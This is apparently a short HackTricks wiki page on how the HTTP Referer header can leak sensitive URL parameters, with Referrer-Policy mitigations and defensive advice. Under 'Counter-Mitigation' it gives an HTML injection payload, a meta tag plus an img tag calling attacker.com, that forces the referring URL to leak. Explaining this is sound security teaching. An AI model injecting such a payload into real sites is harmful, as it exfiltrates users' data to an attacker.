Interesting HTTP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Referrer headers and policy

Referrer is the header used by browsers to indicate which was the previous page visited.

Sensitive information leaked

If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest (social engineering) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request.

Mitigation

You can make the browser follow a Referrer-policy that could avoid the sensitive information to be sent to other web applications:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Counter-Mitigation

You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Defense

Never put any sensitive data inside GET parameters or paths in the URL.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousOther Web Tricks NextAndroid Forensics

Last updated 4 months ago